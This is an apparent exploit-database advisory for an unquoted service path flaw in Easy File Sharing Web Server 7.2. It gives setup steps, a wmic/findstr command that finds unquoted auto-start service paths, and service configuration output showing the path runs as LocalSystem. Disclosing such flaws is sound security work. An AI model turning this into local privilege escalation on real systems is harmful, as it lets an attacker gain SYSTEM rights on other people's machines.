Easy File Sharing Web Server 7.2 Unquoted Service Path

Easy File Sharing Web Server version 7.2 suffers from an unquoted service path vulnerability.


MD5 | c257e7dabc5b7439f1f63487a9ab8065

Exploit Title: Easy File Sharing Web Server v7.2 - 'Easy File Sharing Web Service' Unquoted Service Path
Exploit Author: boku
Date: 02/10/2020
Vendor Homepage: http://www.sharing-file.com/
Software Link: http://www.sharing-file.com/efssetup.exe
Version: 7.2
Tested On: Windows 10 (32-bit)
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open EFS Web Server and click the 'Service...' Button on the bottom right
# 3) Click 'Install Service' Button

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Easy File Sharing Web Service C:\EFS Software\Easy File Sharing Web Server\fswsService.exe Auto

C:\Users\nightelf>sc qc "Easy File Sharing Web Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Easy File Sharing Web Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\EFS Software\Easy File Sharing Web Server\fswsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Easy File Sharing Web Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Related Posts